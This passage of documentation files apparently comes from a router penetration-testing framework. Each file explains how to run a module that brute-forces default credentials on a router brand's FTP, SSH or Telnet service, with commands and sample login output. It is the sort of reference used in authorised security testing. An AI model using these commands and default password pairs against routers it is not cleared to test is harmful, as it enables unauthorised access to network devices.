[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/routers/comtrend/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Comtrend Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/comtrend/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/comtrend/telnet_default_creds
rsf (Comtrend Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Comtrend Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/routers/dlink/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against D-Link Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/dlink/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/dlink/ftp_default_creds
rsf (D-Link Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/routers/dlink/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against D-Link Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/dlink/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/dlink/ssh_default_creds
rsf (D-Link Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/routers/dlink/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against D-Link Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/dlink/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/dlink/telnet_default_creds
rsf (D-Link Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/routers/fortinet/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Fortined Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/fortinet/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/fortinet/ftp_default_creds
rsf (Fortinet Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Fortinet Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/routers/fortinet/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Fortinet Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/fortinet/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/fortinet/ssh_default_creds
rsf (Fortinet Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Fortinet Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/routers/fortinet/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Fortinet Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/fortinet/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/fortinet/telnet_default_creds
rsf (Fortinet Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Fortinet Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/routers/huawei/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Huawei Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/huawei/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/huawei/ftp_default_creds
rsf (Huawei Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Huawei Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/routers/huawei/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Huawei Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/huawei/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/huawei/ssh_default_creds
rsf (Huawei Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Huawei Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/routers/huawei/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Huawei Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/huawei/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/huawei/telnet_default_creds
rsf (Huawei Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Huawei Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/routers/ipfire/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against IPFire Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/ipfire/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/ipfire/ftp_default_creds
rsf (IPFire Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (IPFire Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/routers/ipfire/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against IPFire Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/ipfire/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/ipfire/ssh_default_creds
rsf (IPFire Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (IPFire Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/routers/ipfire/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against IPFire Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/ipfire/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/ipfire/telnet_default_creds
rsf (IPFire Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (IPFire Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/routers/juniper/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Juniper Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/juniper/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/juniper/ftp_default_creds
rsf (Juniper Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Juniper Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/routers/juniper/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Juniper Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/juniper/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/juniper/ssh_default_creds
rsf (Juniper Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Juniper Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/routers/juniper/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Juniper Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/juniper/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/juniper/telnet_default_creds
rsf (Juniper Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Juniper Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/routers/linksys/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Linksys Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/linksys/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/linksys/ftp_default_creds
rsf (Linksys Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Linksys Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/routers/linksys/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Linksys Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/linksys/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/linksys/ssh_default_creds
rsf (Linksys Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Linksys Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/routers/linksys/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Linksys Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/linksys/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/linksys/telnet_default_creds
rsf (Linksys Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Linksys Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/routers/mikrotik/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Mikrotik Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/mikrotik/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/mikrotik/ftp_default_creds
rsf (Mikrotik Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Mikrotik Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/routers/mikrotik/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Mikrotik Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/mikrotik/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/mikrotik/ssh_default_creds
rsf (Mikrotik Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Mikrotik Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/routers/mikrotik/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Mikrotik Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/mikrotik/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/mikrotik/telnet_default_creds
rsf (Mikrotik Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Mikrotik Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/routers/movistar/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Movistar Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/movistar/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/movistar/ftp_default_creds
rsf (Movistar Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Movistar Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/routers/movistar/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Movistar Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/movistar/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/movistar/ssh_default_creds
rsf (Movistar Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Movistar Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/routers/movistar/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Movistar Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/movistar/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/movistar/telnet_default_creds
rsf (Movistar Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Movistar Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/routers/netcore/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Netcore Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/netcore/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/netcore/ftp_default_creds
